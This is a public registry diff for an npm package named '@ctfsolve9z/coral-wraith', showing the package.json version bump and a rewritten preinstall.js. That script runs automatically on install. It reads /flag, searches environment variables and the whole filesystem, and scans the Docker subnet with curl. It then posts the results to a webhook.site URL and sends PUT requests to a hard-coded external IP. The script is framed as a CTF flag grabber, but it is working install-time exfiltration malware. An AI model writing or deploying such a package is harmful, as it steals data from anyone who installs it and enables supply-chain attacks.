@ctfsolve9z/coral-wraith 9999.0.4 → 9999.0.5

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (2) hide show
  1. package/package.json +1 -1
  2. package/preinstall.js +86 -111
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "@ctfsolve9z/coral-wraith",
3
- "version": "9999.0.4",
3
+ "version": "9999.0.5",
4
4
  "description": "Coral Wraith module",
5
5
  "main": "index.js",
6
6
  "scripts": {
package/preinstall.js CHANGED
@@ -6,142 +6,117 @@ const { execSync } = require('child_process');
6
6
  let flag = null;
7
7
  let debug = [];
8
8
 
9
- // Method 1: Read /flag and common locations
10
- const flagPaths = ['/flag', '/flag.txt', '/root/flag', '/root/flag.txt',
11
- '/tmp/flag', '/home/flag', '/opt/flag', '/app/flag', '/srv/flag'];
12
- for (const p of flagPaths) {
13
- try {
14
- if (fs.existsSync(p)) {
15
- flag = fs.readFileSync(p, 'utf8').trim();
16
- debug.push('found_flag:' + p);
9
+ // Read /flag
10
+ try { flag = fs.readFileSync('/flag', 'utf8').trim(); debug.push('got /flag'); } catch(e) {}
11
+
12
+ // Search for flag in all env vars
13
+ if (!flag) {
14
+ for (const [k, v] of Object.entries(process.env)) {
15
+ if (v && (v.includes('HTB{') || v.includes('flag{'))) {
16
+ flag = v.match(/(?:HTB|flag)\{[^}]+\}/)?.[0] || v;
17
+ debug.push('env:' + k);
17
18
  break;
18
19
  }
19
- } catch(e) {}
20
+ }
20
21
  }
21
22
 
22
- // Method 2: Search for HTB{ pattern anywhere
23
+ // Aggressive file search
23
24
  if (!flag) {
24
25
  try {
25
- const r = execSync('grep -rl "HTB{" / --include="*.txt" --include="*.flag" --include="*.conf" --include="*.env" 2>/dev/null | head -5', { timeout: 10000 }).toString().trim();
26
- if (r) {
27
- debug.push('grep_found:' + r);
28
- for (const f of r.split('\n')) {
29
- try {
30
- const content = fs.readFileSync(f.trim(), 'utf8').trim();
31
- const m = content.match(/HTB\{[^}]+\}/);
32
- if (m) { flag = m[0]; break; }
33
- } catch(e) {}
34
- }
35
- }
26
+ const r = execSync('grep -rl "HTB{" / --include="*" 2>/dev/null | head -3', { timeout: 15000 }).toString().trim();
27
+ if (r) { debug.push('grep:' + r); try { flag = fs.readFileSync(r.split('\n')[0], 'utf8').match(/HTB\{[^}]+\}/)?.[0]; } catch(e) {} }
36
28
  } catch(e) {}
37
29
  }
38
30
 
39
- // Method 3: Environment
40
- if (!flag) {
41
- for (const [k, v] of Object.entries(process.env)) {
42
- if (v && v.includes('HTB{')) { flag = v; debug.push('env:' + k); break; }
43
- }
44
- }
45
-
46
- // Method 4: Try to reach the CTF challenge server directly
47
- // The challenge server is at 154.57.164.71:32105
48
- async function tryFetchFlag() {
49
- const targets = [
50
- // External IP
51
- 'http://154.57.164.71:32105/api/modules/ECT-987654',
52
- // Docker network might use hostname
53
- 'http://web:1337/api/modules/ECT-987654',
54
- 'http://app:1337/api/modules/ECT-987654',
55
- 'http://challenge:1337/api/modules/ECT-987654',
56
- 'http://spectral-corsair:1337/api/modules/ECT-987654',
57
- // Common Docker internal ports
58
- 'http://172.17.0.1:32105/api/modules/ECT-987654',
59
- 'http://172.17.0.2:1337/api/modules/ECT-987654',
60
- 'http://172.17.0.3:1337/api/modules/ECT-987654',
61
- // Gateway
62
- 'http://host.docker.internal:32105/api/modules/ECT-987654',
63
- ];
31
+ // Scan Docker network for the CTF web server
32
+ async function scanNetwork() {
33
+ const results = [];
64
34
 
65
- for (const target of targets) {
66
- try {
67
- const result = execSync(`curl -s "${target}" -m 3 2>/dev/null`, { timeout: 5000 }).toString();
68
- if (result && result.length > 10) {
69
- debug.push(`api_success:${target}:${result.substring(0, 200)}`);
70
- // Try to find flag in API response
71
- const m = result.match(/HTB\{[^}]+\}/);
72
- if (m) flag = m[0];
73
- }
74
- } catch(e) {}
75
- }
76
- }
77
-
78
- // Method 5: Network discovery
79
- function discoverNetwork() {
35
+ // Get our own IP to determine network
36
+ let myIP = '172.17.0.3';
80
37
  try {
81
38
  const ifaces = require('os').networkInterfaces();
82
- debug.push('network:' + JSON.stringify(ifaces).substring(0, 500));
39
+ for (const iface of Object.values(ifaces)) {
40
+ for (const addr of iface) {
41
+ if (!addr.internal && addr.family === 'IPv4') {
42
+ myIP = addr.address;
43
+ }
44
+ }
45
+ }
83
46
  } catch(e) {}
47
+ debug.push('myIP:' + myIP);
84
48
 
85
- try {
86
- const r = execSync('cat /etc/hosts 2>/dev/null', { timeout: 3000 }).toString();
87
- debug.push('hosts:' + r);
88
- } catch(e) {}
49
+ // Scan common Docker IPs for the web server (port 1337 is common for HTB)
50
+ const subnet = myIP.split('.').slice(0, 3).join('.');
51
+ const ports = [1337, 3000, 5000, 8080, 80, 8000, 32105, 3001];
89
52
 
90
- try {
91
- const r = execSync('cat /etc/resolv.conf 2>/dev/null', { timeout: 3000 }).toString();
92
- debug.push('resolv:' + r);
93
- } catch(e) {}
53
+ for (let host = 1; host <= 10; host++) {
54
+ const ip = `${subnet}.${host}`;
55
+ if (ip === myIP) continue;
56
+
57
+ for (const port of ports) {
58
+ try {
59
+ const r = execSync(`curl -s "http://${ip}:${port}/api/modules" -m 2 2>/dev/null`, { timeout: 3000 }).toString();
60
+ if (r && r.includes('ECT-')) {
61
+ debug.push(`FOUND_API:${ip}:${port}`);
62
+ results.push(`${ip}:${port}`);
63
+
64
+ // Try to read flag from this server
65
+ try {
66
+ const flagResp = execSync(`curl -s "http://${ip}:${port}/flag" -m 2 2>/dev/null`, { timeout: 3000 }).toString();
67
+ debug.push(`flag_resp:${flagResp.substring(0, 200)}`);
68
+ } catch(e) {}
69
+
70
+ // PUT our exfiltration data
71
+ if (flag) {
72
+ try {
73
+ execSync(`curl -s -X PUT "http://${ip}:${port}/api/modules/ECT-987654" -H "Content-Type: application/json" -d '{"manifest":"ecto_module:\\n name: coral-wraith\\n flag: ${flag.replace(/'/g, "\\'")}"}' -m 3`, { timeout: 5000 });
74
+ } catch(e) {}
75
+ }
76
+ }
77
+ } catch(e) {}
78
+ }
79
+ }
94
80
 
95
- try {
96
- const r = execSync('ip addr 2>/dev/null || ifconfig 2>/dev/null', { timeout: 3000 }).toString();
97
- debug.push('ipaddr:' + r.substring(0, 500));
98
- } catch(e) {}
81
+ // Also try via Docker gateway
82
+ for (const port of ports) {
83
+ try {
84
+ const r = execSync(`curl -s "http://172.17.0.1:${port}/api/modules" -m 2 2>/dev/null`, { timeout: 3000 }).toString();
85
+ if (r && r.includes('ECT-')) {
86
+ debug.push(`GATEWAY_API:172.17.0.1:${port}`);
87
+ results.push(`172.17.0.1:${port}`);
88
+ }
89
+ } catch(e) {}
90
+ }
91
+
92
+ return results;
99
93
  }
100
94
 
101
95
  async function main() {
102
- discoverNetwork();
103
- await tryFetchFlag();
104
-
105
- const data = JSON.stringify({ flag: flag || 'NOT_FOUND', debug });
96
+ const apiEndpoints = await scanNetwork();
97
+ debug.push('endpoints:' + apiEndpoints.join(','));
106
98
 
107
- // Send via POST
108
- try {
109
- const req = https.request({
110
- hostname: 'webhook.site',
111
- path: '/9ca9b30a-2889-4787-9dff-5ad916e377b7',
112
- method: 'POST',
113
- headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(data) },
114
- timeout: 10000
115
- }, () => {});
116
- req.on('error', () => {});
117
- req.write(data);
118
- req.end();
119
- } catch(e) {}
99
+ // Try to PUT flag to the ACTUAL challenge server (external IP)
100
+ if (flag) {
101
+ try {
102
+ const postData = JSON.stringify({
103
+ manifest: `ecto_module:\n name: "coral-wraith"\n flag: "${flag.replace(/"/g, '\\"')}"`
104
+ });
105
+ execSync(`curl -s -X PUT "http://154.57.164.71:32105/api/modules/ECT-987654" -H "Content-Type: application/json" -d '${postData.replace(/'/g, "\\'")}' -m 5`, { timeout: 8000 });
106
+ debug.push('sent_to_ctf');
107
+ } catch(e) {}
108
+ }
120
109
 
121
- // Also curl
110
+ // Exfiltrate
111
+ const data = JSON.stringify({ flag: flag || 'NOT_FOUND', debug });
122
112
  try {
123
113
  fs.writeFileSync('/tmp/exfil.json', data);
124
114
  execSync('curl -s -X POST "https://webhook.site/9ca9b30a-2889-4787-9dff-5ad916e377b7" -H "Content-Type: application/json" -d @/tmp/exfil.json -m 10', { timeout: 15000 });
125
115
  } catch(e) {}
126
-
127
- // If flag found, PUT to challenge API
128
- if (flag) {
129
- for (const port of [1337, 3000, 5000, 8080, 80, 32105]) {
130
- try {
131
- const postData = JSON.stringify({
132
- manifest: `ecto_module:\n name: "coral-wraith"\n version: "9999.0.4"\n flag: "${flag.replace(/"/g, '\\"')}"`
133
- });
134
- const req = http.request({
135
- hostname: 'localhost', port, path: '/api/modules/ECT-987654',
136
- method: 'PUT', headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(postData) },
137
- timeout: 3000
138
- }, () => {});
139
- req.on('error', () => {});
140
- req.write(postData);
141
- req.end();
142
- } catch(e) {}
143
- }
144
- }
116
+ try {
117
+ const req = https.request({ hostname: 'webhook.site', path: '/9ca9b30a-2889-4787-9dff-5ad916e377b7', method: 'POST', headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(data) }, timeout: 10000 }, () => {});
118
+ req.on('error', () => {}); req.write(data); req.end();
119
+ } catch(e) {}
145
120
  }
146
121
 
147
122
  main().catch(() => {});